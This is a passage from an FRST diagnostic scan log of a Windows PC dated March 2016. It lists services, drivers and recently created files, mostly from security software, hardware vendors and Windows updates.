(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S2 EgisTec Service; C:\Program Files (x86)\Hewlett-Packard\HP SimplePass Identity Protection\EgisService.exe [689008 2010-03-25] (Egis Technology Inc. )
R2 Fitbit Connect; C:\Program Files (x86)\Fitbit Connect\FitbitConnectService.exe [5738528 2014-11-07] (Fitbit, Inc.) [File not signed]
R2 FPLService; C:\Program Files (x86)\HP SimplePass\TrueSuiteService.exe [1641768 2013-06-07] (HP)
R2 HPSupportSolutionsFrameworkService; C:\Program Files (x86)\Hp\Common\HPSupportSolutionsFrameworkService.exe [46904 2013-12-17] (Hewlett-Packard Company)
R2 igfxCUIService1.0.0.0; C:\Windows\system32\igfxCUIService.exe [330136 2015-10-30] (Intel Corporation)
R2 IJPLMSVC; C:\Program Files (x86)\Canon\IJPLM\IJPLMSVC.EXE [140456 2012-03-27] ()
R2 Intel® ME Service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\FWService\IntelMeFWService.exe [128896 2012-07-17] (Intel Corporation)
R2 jhi_service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe [165760 2012-07-17] (Intel Corporation)
R2 MBAMScheduler; C:\Users\levilaing\Desktop\Malwarebytes Anti-Malware\mbamscheduler.exe [1513784 2015-10-05] (Malwarebytes)
R2 MBAMService; C:\Users\levilaing\Desktop\Malwarebytes Anti-Malware\mbamservice.exe [1135416 2015-10-05] (Malwarebytes)
R2 NS; C:\Program Files (x86)\Norton Security\Engine\22.5.5.15\NS.exe [282016 2015-11-20] (Symantec Corporation)
S3 SwitchBoard; C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Adobe Systems Incorporated) [File not signed]
R2 SynTPEnhService; C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe [246472 2015-07-17] (Synaptics Incorporated)
S3 TrueService; C:\Program Files\Common Files\AuthenTec\TrueService.exe [401856 2013-01-07] (AuthenTec, Inc.)
R2 valWBFPolicyService; C:\Windows\system32\valWBFPolicyService.exe [28160 2012-09-06] () [File not signed]
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [364464 2015-10-30] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [24864 2015-10-30] (Microsoft Corporation)
S2 EraserSvc11511; "C:\Program Files (x86)\Norton Security\Engine\22.5.4.24\NS.exe" /h ccCommon [X]

===================== Drivers (Whitelisted) ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R1 BHDrvx64; C:\Program Files (x86)\Norton Security\NortonData\22.5.4.24\Definitions\BASHDefs\20160213.003\BHDrvx64.sys [1665608 2015-10-08] (Symantec Corporation)
R1 ccSet_NS; C:\Windows\system32\drivers\NSx64\1605050.00F\ccSetx64.sys [173808 2015-09-23] (Symantec Corporation)
R1 CLVirtualDrive; C:\Windows\system32\DRIVERS\CLVirtualDrive.sys [92536 2012-06-25] (CyberLink)
R1 eeCtrl; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\eeCtrl64.sys [498512 2015-12-23] (Symantec Corporation)
R3 EraserUtilRebootDrv; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys [157520 2015-12-23] (Symantec Corporation)
R1 IDSVia64; C:\Program Files (x86)\Norton Security\NortonData\22.5.4.24\Definitions\IPSDefs\20160308.002\IDSvia64.sys [767224 2016-02-15] (Symantec Corporation)
R3 MBAMProtector; C:\WINDOWS\system32\drivers\mbam.sys [25816 2015-10-05] (Malwarebytes)
R3 MBAMSwissArmy; C:\WINDOWS\system32\drivers\MBAMSwissArmy.sys [192216 2016-03-09] (Malwarebytes)
R3 MBAMWebAccessControl; C:\WINDOWS\system32\drivers\mwac.sys [64216 2015-10-05] (Malwarebytes Corporation)
R3 NAVENG; C:\Program Files (x86)\Norton Security\NortonData\22.5.4.24\Definitions\VirusDefs\20160309.020\ENG64.SYS [138488 2015-12-23] (Symantec Corporation)
R3 NAVEX15; C:\Program Files (x86)\Norton Security\NortonData\22.5.4.24\Definitions\VirusDefs\20160309.020\EX64.SYS [2148080 2015-12-23] (Symantec Corporation)
R3 netr28x; C:\Windows\system32\DRIVERS\netr28x.sys [2554528 2015-06-12] (MediaTek Inc.)
S3 RSP2STOR; C:\Windows\system32\DRIVERS\RtsP2Stor.sys [310528 2015-06-05] (Realtek Semiconductor Corp.)
R3 rt640x64; C:\Windows\System32\drivers\rt640x64.sys [589824 2015-10-30] (Realtek                                            )
S3 SmbDrv; C:\Windows\System32\drivers\Smb_driver_AMDASF.sys [41272 2012-08-24] (Synaptics Incorporated)
R3 SmbDrvI; C:\Windows\system32\DRIVERS\Smb_driver_Intel.sys [42696 2015-07-17] (Synaptics Incorporated)
R3 SRTSP; C:\Windows\System32\Drivers\NSx64\1605050.00F\SRTSP64.SYS [928496 2015-11-11] (Symantec Corporation)
R1 SRTSPX; C:\Windows\system32\drivers\NSx64\1605050.00F\SRTSPX64.SYS [50936 2015-09-23] (Symantec Corporation)
R0 SymEFASI; C:\Windows\System32\drivers\NSx64\1605050.00F\SYMEFASI64.SYS [1621232 2015-11-11] (Symantec Corporation)
S4 SymELAM; C:\Windows\system32\drivers\NSx64\1605050.00F\SymELAM.sys [24192 2015-09-23] (Symantec Corporation)
R3 SymEvent; C:\WINDOWS\system32\Drivers\SYMEVENT64x86.SYS [111344 2015-12-24] (Symantec Corporation)
R1 SymIRON; C:\Windows\system32\drivers\NSx64\1605050.00F\Ironx64.SYS [297720 2015-09-23] (Symantec Corporation)
R1 SymNetS; C:\Windows\System32\Drivers\NSx64\1605050.00F\SYMNETS.SYS [577768 2015-11-11] (Symantec Corporation)
S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [44568 2015-10-30] (Microsoft Corporation)
S3 WdFilter; C:\Windows\system32\drivers\WdFilter.sys [293216 2015-10-30] (Microsoft Corporation)
S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [118112 2015-10-30] (Microsoft Corporation)
R3 WirelessButtonDriver; C:\Windows\System32\drivers\WirelessButtonDriver64.sys [20800 2013-02-08] (Hewlett-Packard Development Company, L.P.)

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-03-09 19:47 - 2016-03-09 19:47 - 00008389 _____ C:\Users\levilaing\Desktop\MBAM.txt
2016-03-09 18:32 - 2016-03-09 19:34 - 00192216 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
2016-03-09 18:31 - 2016-03-09 18:31 - 00000910 _____ C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2016-03-09 18:31 - 2016-03-09 18:31 - 00000000 ____D C:\Users\levilaing\Desktop\Malwarebytes Anti-Malware
2016-03-09 18:31 - 2016-03-09 18:31 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2016-03-09 18:31 - 2016-03-09 18:31 - 00000000 ____D C:\ProgramData\Malwarebytes
2016-03-09 18:31 - 2015-10-05 09:50 - 00109272 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbamchameleon.sys
2016-03-09 18:31 - 2015-10-05 09:50 - 00064216 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\mwac.sys
2016-03-09 18:31 - 2015-10-05 09:50 - 00025816 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbam.sys
2016-03-09 18:28 - 2016-03-09 18:28 - 22908888 _____ (Malwarebytes ) C:\Users\levilaing\Downloads\mbam-setup-2.2.0.1024.exe
2016-03-09 17:53 - 2016-03-09 17:54 - 00029841 _____ C:\Users\levilaing\Desktop\Addition.txt
2016-03-09 17:52 - 2016-03-09 19:47 - 00026088 _____ C:\Users\levilaing\Desktop\FRST.txt
2016-03-09 17:47 - 2016-03-09 17:47 - 00002268 _____ C:\Users\levilaing\Desktop\JRT.txt
2016-03-09 17:42 - 2016-03-09 17:42 - 01609216 _____ (Malwarebytes) C:\Users\levilaing\Downloads\JRT.exe
2016-03-09 17:27 - 2016-03-09 17:33 - 00000000 ____D C:\Program Files (x86)\AdwCleaner
2016-03-09 17:26 - 2016-03-09 17:26 - 01524224 _____ C:\Users\levilaing\Downloads\adwcleaner_5.101.exe
2016-03-09 16:45 - 2016-03-09 16:45 - 00019460 _____ C:\Users\levilaing\Desktop\Fixlog.txt
2016-03-09 16:34 - 2016-02-24 03:51 - 07474528 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2016-03-09 16:34 - 2016-02-24 03:28 - 03449168 _____ (Microsoft Corporation) C:\WINDOWS\system32\WSService.dll
2016-03-09 16:34 - 2016-02-24 02:46 - 06607080 _____ (Microsoft Corporation) C:\WINDOWS\system32\windows.storage.dll
2016-03-09 16:34 - 2016-02-24 02:11 - 01997152 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgkrnl.sys
2016-03-09 16:34 - 2016-02-24 02:06 - 05242496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\windows.storage.dll
2016-03-09 16:34 - 2016-02-24 00:43 - 00286720 _____ (Microsoft Corporation) C:\WINDOWS\system32\deviceaccess.dll
2016-03-09 16:34 - 2016-02-24 00:40 - 01224704 _____ (Microsoft Corporation) C:\WINDOWS\system32\Unistore.dll
2016-03-09 16:34 - 2016-02-24 00:39 - 01390592 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kbase.sys
2016-03-09 16:34 - 2016-02-24 00:11 - 03593216 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
2016-03-09 16:34 - 2016-02-24 00:09 - 00228352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\deviceaccess.dll
2016-03-09 16:34 - 2016-02-24 00:07 - 00949248 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Unistore.dll
2016-03-09 16:34 - 2016-02-24 00:01 - 01831936 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.dll
2016-03-09 16:34 - 2016-02-24 00:00 - 02273792 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
2016-03-09 16:34 - 2016-02-24 00:00 - 01098752 _____ (Microsoft Corporation) C:\WINDOWS\system32\dosvc.dll
2016-03-09 16:34 - 2016-02-23 23:55 - 01996288 _____ (Microsoft Corporation) C:\WINDOWS\system32\ActiveSyncProvider.dll
2016-03-09 16:34 - 2016-02-23 23:34 - 01707520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ActiveSyncProvider.dll
2016-03-09 16:34 - 2016-02-23 23:20 - 22376960 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
2016-03-09 16:34 - 2016-02-23 23:18 - 18677760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
2016-03-09 16:34 - 2016-02-23 23:12 - 19339776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2016-03-09 16:34 - 2016-02-23 23:12 - 05321728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Data.Pdf.dll
2016-03-09 16:34 - 2016-02-23 23:10 - 24600576 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2016-03-09 16:34 - 2016-02-23 23:09 - 06972416 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Data.Pdf.dll
2016-03-09 16:34 - 2016-02-23 23:05 - 12586496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wmp.dll
2016-03-09 16:34 - 2016-02-23 23:03 - 14252544 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmp.dll
2016-03-09 16:34 - 2016-02-23 22:59 - 05661696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll
2016-03-09 16:34 - 2016-02-23 22:55 - 07835648 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
2016-03-09 16:33 - 2016-02-29 23:31 - 00848168 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfsvr.dll
2016-03-09 16:33 - 2016-02-29 23:22 - 00709688 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfsvr.dll
2016-03-09 16:33 - 2016-02-24 03:52 - 01997328 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll
2016-03-09 16:33 - 2016-02-24 03:48 - 00713568 _____ (Microsoft Corporation) C:\WINDOWS\system32\invagent.dll
2016-03-09 16:33 - 2016-02-24 03:47 - 01173344 _____ (Microsoft Corporation) C:\WINDOWS\system32\aeinv.dll
2016-03-09 16:33 - 2016-02-24 03:40 - 00513888 _____ (Microsoft Corporation) C:\WINDOWS\system32\devinv.dll
2016-03-09 16:33 - 2016-02-24 03:34 - 01613664 _____ (Microsoft Corporation) C:\WINDOWS\system32\diagtrack.dll
2016-03-09 16:33 - 2016-02-24 03:15 - 01557768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KernelBase.dll
2016-03-09 16:33 - 2016-02-24 02:58 - 00794888 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfds.dll
2016-03-09 16:33 - 2016-02-24 02:54 - 00127840 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\USBSTOR.SYS
2016-03-09 16:33 - 2016-02-24 02:51 - 01322248 _____ (Microsoft Corporation) C:\WINDOWS\system32\ole32.dll
2016-03-09 16:33 - 2016-02-24 02:50 - 00808800 _____ (Microsoft Corporation) C:\WINDOWS\system32\WWAHost.exe
2016-03-09 16:33 - 2016-02-24 02:43 - 00625000 _____ (Microsoft Corporation) C:\WINDOWS\system32\ClipSVC.dll
2016-03-09 16:33 - 2016-02-24 02:39 - 00358752 _____ (Microsoft Corporation) C:\WINDOWS\system32\msv1_0.dll
2016-03-09 16:33 - 2016-02-24 02:39 - 00141560 _____ (Microsoft Corporation) C:\WINDOWS\system32\AuthHost.exe
2016-03-09 16:33 - 2016-02-24 02:19 - 00670928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfds.dll
2016-03-09 16:33 - 2016-02-24 02:14 - 00216416 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppxAllUserStore.dll
2016-03-09 16:33 - 2016-02-24 02:11 - 00957608 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ole32.dll
2016-03-09 16:33 - 2016-02-24 02:11 - 00703840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WWAHost.exe
2016-03-09 16:33 - 2016-02-24 02:11 - 00652392 _____ (Microsoft Corporation) C:\WINDOWS\system32\dxgi.dll
2016-03-09 16:33 - 2016-02-24 02:11 - 00394080 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms1.sys
2016-03-09 16:33 - 2016-02-24 02:11 - 00258280 _____ (Microsoft Corporation) C:\WINDOWS\system32\sqmapi.dll
2016-03-09 16:33 - 2016-02-24 02:10 - 00630632 _____ (Microsoft Corporation) C:\WINDOWS\system32\fontdrvhost.exe
2016-03-09 16:33 - 2016-02-24 02:10 - 00576864 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms2.sys
2016-03-09 16:33 - 2016-02-24 02:09 - 00640472 _____ (Microsoft Corporation) C:\WINDOWS\system32\wer.dll
2016-03-09 16:33 - 2016-02-24 02:09 - 00147808 _____ (Microsoft Corporation) C:\WINDOWS\system32\wermgr.exe
2016-03-09 16:33 - 2016-02-24 01:59 - 00294752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msv1_0.dll
2016-03-09 16:33 - 2016-02-24 01:39 - 00045568 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataTypeHelperUtil.dll
2016-03-09 16:33 - 2016-02-24 01:39 - 00023552 _____ (Microsoft Corporation) C:\WINDOWS\system32\ExtrasXmlParser.dll
2016-03-09 16:33 - 2016-02-24 01:38 - 00187744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppxAllUserStore.dll
2016-03-09 16:33 - 2016-02-24 01:38 - 00111616 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataTimeUtil.dll
2016-03-09 16:33 - 2016-02-24 01:37 - 00045056 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataLanguageUtil.dll
2016-03-09 16:33 - 2016-02-24 01:36 - 00060416 _____ (Microsoft Corporation) C:\WINDOWS\system32\PimIndexMaintenanceClient.dll
2016-03-09 16:33 - 2016-02-24 01:35 - 00540752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fontdrvhost.exe
2016-03-09 16:33 - 2016-02-24 01:35 - 00523752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dxgi.dll
2016-03-09 16:33 - 2016-02-24 01:35 - 00220064 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\sqmapi.dll
2016-03-09 16:33 - 2016-02-24 01:35 - 00045568 _____ (Adobe Systems) C:\WINDOWS\system32\atmlib.dll
2016-03-09 16:33 - 2016-02-24 01:33 - 00538736 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wer.dll
2016-03-09 16:33 - 2016-02-24 01:33 - 00141664 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wermgr.exe
2016-03-09 16:33 - 2016-02-24 01:31 - 00118272 _____ (Microsoft Corporation) C:\WINDOWS\system32\fontsub.dll
2016-03-09 16:33 - 2016-02-24 01:30 - 00025600 _____ (Microsoft Corporation) C:\WINDOWS\system32\wfapigp.dll
2016-03-09 16:33 - 2016-02-24 01:28 - 00070656 _____ (Microsoft Corporation) C:\WINDOWS\system32\POSyncServices.dll
2016-03-09 16:33 - 2016-02-24 01:23 - 00091648 _____ (Microsoft Corporation) C:\WINDOWS\system32\asycfilt.dll
2016-03-09 16:33 - 2016-02-24 01:23 - 00068096 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataPlatformHelperUtil.dll
2016-03-09 16:33 - 2016-02-24 01:22 - 00196608 _____ (Microsoft Corporation) C:\WINDOWS\system32\fwpolicyiomgr.dll
2016-03-09 16:33 - 2016-02-24 01:20 - 00195072 _____ (Microsoft Corporation) C:\WINDOWS\system32\VCardParser.dll
2016-03-09 16:33 - 2016-02-24 01:20 - 00167936 _____ (Microsoft Corporation) C:\WINDOWS\system32\dafBth.dll
2016-03-09 16:33 - 2016-02-24 01:20 - 00087552 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppxSysprep.dll
2016-03-09 16:33 - 2016-02-24 01:19 - 00145408 _____ (Microsoft Corporation) C:\WINDOWS\system32\dssvc.dll
2016-03-09 16:33 - 2016-02-24 01:19 - 00031232 _____ (Microsoft Corporation) C:\WINDOWS\system32\seclogon.dll
2016-03-09 16:33 - 2016-02-24 01:15 - 00365568 _____ (Adobe Systems Incorporated) C:\WINDOWS\system32\atmfd.dll
2016-03-09 16:33 - 2016-02-24 01:14 - 00274944 _____ (Microsoft Corporation) C:\WINDOWS\system32\ExSMime.dll
2016-03-09 16:33 - 2016-02-24 01:13 - 00121856 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppointmentActivation.dll
2016-03-09 16:33 - 2016-02-24 01:12 - 00243712 _____ (Microsoft Corporation) C:\WINDOWS\system32\cemapi.dll
2016-03-09 16:33 - 2016-02-24 01:12 - 00221184 _____ (Microsoft Corporation) C:\WINDOWS\system32\PhoneCallHistoryApis.dll
2016-03-09 16:33 - 2016-02-24 01:10 - 00093184 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpninprc.dll
2016-03-09 16:33 - 2016-02-24 01:09 - 00258560 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataAccountApis.dll
2016-03-09 16:33 - 2016-02-24 01:09 - 00161792 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppxSip.dll
2016-03-09 16:33 - 2016-02-24 01:07 - 00252928 _____ (Microsoft Corporation) C:\WINDOWS\system32\PimIndexMaintenance.dll
2016-03-09 16:33 - 2016-02-24 01:05 - 00208896 _____ (Microsoft Corporation) C:\WINDOWS\system32\storewuauth.dll
2016-03-09 16:33 - 2016-02-24 01:03 - 00088576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\olepro32.dll
2016-03-09 16:33 - 2016-02-24 01:02 - 00161280 _____ (Microsoft Corporation) C:\WINDOWS\system32\CallHistoryClient.dll
2016-03-09 16:33 - 2016-02-24 01:01 - 00764928 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakradiag.dll
2016-03-09 16:33 - 2016-02-24 01:01 - 00146432 _____ (Microsoft Corporation) C:\WINDOWS\system32\AuthBroker.dll
2016-03-09 16:33 - 2016-02-24 01:01 - 00067584 _____ (Microsoft Corporation) C:\WINDOWS\system32\profext.dll
2016-03-09 16:33 - 2016-02-24 01:00 - 00214528 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Scanners.dll
2016-03-09 16:33 - 2016-02-24 00:59 - 00450560 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.Bluetooth.dll
2016-03-09 16:33 - 2016-02-24 00:59 - 00360448 _____ (Microsoft Corporation) C:\WINDOWS\system32\vaultsvc.dll
2016-03-09 16:33 - 2016-02-24 00:59 - 00318976 _____ (Microsoft Corporation) C:\WINDOWS\system32\domgmt.dll
2016-03-09 16:33 - 2016-02-24 00:58 - 00685568 _____ (Microsoft Corporation) C:\WINDOWS\system32\scapi.dll
2016-03-09 16:33 - 2016-02-24 00:55 - 00790528 _____ (Microsoft Corporation) C:\WINDOWS\system32\EmailApis.dll
2016-03-09 16:33 - 2016-02-24 00:55 - 00224256 _____ (Microsoft Corporation) C:\WINDOWS\system32\PackageStateRoaming.dll
2016-03-09 16:33 - 2016-02-24 00:55 - 00018944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ExtrasXmlParser.dll
2016-03-09 16:33 - 2016-02-24 00:54 - 00526336 _____ (Microsoft Corporation) C:\WINDOWS\system32\FirewallAPI.dll
2016-03-09 16:33 - 2016-02-24 00:54 - 00288768 _____ (Microsoft Corporation) C:\WINDOWS\system32\vaultcli.dll
2016-03-09 16:33 - 2016-02-24 00:54 - 00228352 _____ (Microsoft Corporation) C:\WINDOWS\system32\wsqmcons.exe
2016-03-09 16:33 - 2016-02-24 00:54 - 00037888 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataTypeHelperUtil.dll
2016-03-09 16:33 - 2016-02-24 00:53 - 00089088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataTimeUtil.dll
2016-03-09 16:33 - 2016-02-24 00:53 - 00037888 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataLanguageUtil.dll
2016-03-09 16:33 - 2016-02-24 00:52 - 00451584 _____ (Microsoft Corporation) C:\WINDOWS\system32\werui.dll
2016-03-09 16:33 - 2016-02-24 00:52 - 00048128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PimIndexMaintenanceClient.dll
2016-03-09 16:33 - 2016-02-24 00:51 - 00037376 _____ (Adobe Systems) C:\WINDOWS\SysWOW64\atmlib.dll
2016-03-09 16:33 - 2016-02-24 00:49 - 00726528 _____ (Microsoft Corporation) C:\WINDOWS\system32\ChatApis.dll
2016-03-09 16:33 - 2016-02-24 00:47 - 00093696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fontsub.dll
2016-03-09 16:33 - 2016-02-24 00:46 - 00020480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wfapigp.dll
2016-03-09 16:33 - 2016-02-24 00:44 - 01713664 _____ (Microsoft Corporation) C:\WINDOWS\system32\SRHInproc.dll
2016-03-09 16:33 - 2016-02-24 00:44 - 00915456 _____ (Microsoft Corporation) C:\WINDOWS\system32\configurationclient.dll
2016-03-09 16:33 - 2016-02-24 00:44 - 00700416 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppointmentApis.dll
2016-03-09 16:33 - 2016-02-24 00:44 - 00056320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\POSyncServices.dll
2016-03-09 16:33 - 2016-02-24 00:43 - 00957952 _____ (Microsoft Corporation) C:\WINDOWS\system32\SRH.dll
2016-03-09 16:33 - 2016-02-24 00:41 - 00982016 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppxPackaging.dll
2016-03-09 16:33 - 2016-02-24 00:41 - 00436736 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentClient.dll
2016-03-09 16:33 - 2016-02-24 00:40 - 00078848 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\asycfilt.dll
2016-03-09 16:33 - 2016-02-24 00:40 - 00056320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataPlatformHelperUtil.dll
2016-03-09 16:33 - 2016-02-24 00:39 - 00164864 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fwpolicyiomgr.dll
2016-03-09 16:33 - 2016-02-24 00:38 - 00150528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\VCardParser.dll
2016-03-09 16:33 - 2016-02-24 00:36 - 01847808 _____ (Microsoft Corporation) C:\WINDOWS\system32\WMPDMC.exe
2016-03-09 16:33 - 2016-02-24 00:34 - 00938496 _____ (Microsoft Corporation) C:\WINDOWS\system32\ContactApis.dll
2016-03-09 16:33 - 2016-02-24 00:34 - 00303104 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\atmfd.dll
2016-03-09 16:33 - 2016-02-24 00:32 - 00223744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ExSMime.dll
2016-03-09 16:33 - 2016-02-24 00:32 - 00098304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppointmentActivation.dll
2016-03-09 16:33 - 2016-02-24 00:31 - 00200704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cemapi.dll
2016-03-09 16:33 - 2016-02-24 00:31 - 00169984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PhoneCallHistoryApis.dll
2016-03-09 16:33 - 2016-02-24 00:28 - 00870912 _____ (Microsoft Corporation) C:\WINDOWS\system32\MPSSVC.dll
2016-03-09 16:33 - 2016-02-24 00:28 - 00196608 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataAccountApis.dll
2016-03-09 16:33 - 2016-02-24 00:28 - 00135168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppxSip.dll
2016-03-09 16:33 - 2016-02-24 00:25 - 00401408 _____ (Microsoft Corporation) C:\WINDOWS\system32\sharemediacpl.dll
2016-03-09 16:33 - 2016-02-24 00:23 - 00129024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CallHistoryClient.dll
2016-03-09 16:33 - 2016-02-24 00:22 - 00053248 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\profext.dll
2016-03-09 16:33 - 2016-02-24 00:21 - 00315904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Internal.Bluetooth.dll
2016-03-09 16:33 - 2016-02-24 00:21 - 00168448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Scanners.dll
2016-03-09 16:33 - 2016-02-24 00:18 - 01490432 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataService.dll
2016-03-09 16:33 - 2016-02-24 00:18 - 00575488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\EmailApis.dll
2016-03-09 16:33 - 2016-02-24 00:18 - 00184832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PackageStateRoaming.dll
2016-03-09 16:33 - 2016-02-24 00:17 - 00369664 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\FirewallAPI.dll
2016-03-09 16:33 - 2016-02-24 00:16 - 00394752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\werui.dll
2016-03-09 16:33 - 2016-02-24 00:13 - 00540160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ChatApis.dll
2016-03-09 16:33 - 2016-02-24 00:09 - 01443328 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SRHInproc.dll
2016-03-09 16:33 - 2016-02-24 00:09 - 00793600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SRH.dll
2016-03-09 16:33 - 2016-02-24 00:09 - 00552960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppointmentApis.dll
2016-03-09 16:33 - 2016-02-24 00:07 - 00890368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppxPackaging.dll
2016-03-09 16:33 - 2016-02-24 00:07 - 00342528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppXDeploymentClient.dll
2016-03-09 16:33 - 2016-02-24 00:04 - 01497088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WMPDMC.exe
2016-03-09 16:33 - 2016-02-24 00:03 - 00769536 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ContactApis.dll
2016-03-09 16:33 - 2016-02-23 23:57 - 02158592 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentServer.dll
2016-03-09 16:33 - 2016-02-23 23:43 - 00184320 _____ (Microsoft Corporation) C:\WINDOWS\system32\fwbase.dll
2016-03-09 16:33 - 2016-02-23 23:22 - 00163328 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fwbase.dll
2016-03-08 17:33 - 2016-03-08 17:34 - 00072040 _____ C:\Users\levilaing\Downloads\FRST.txt
2016-03-08 17:33 - 2016-03-08 17:33 - 02374144 _____ (Farbar) C:\Users\levilaing\Desktop\FRST64.exe
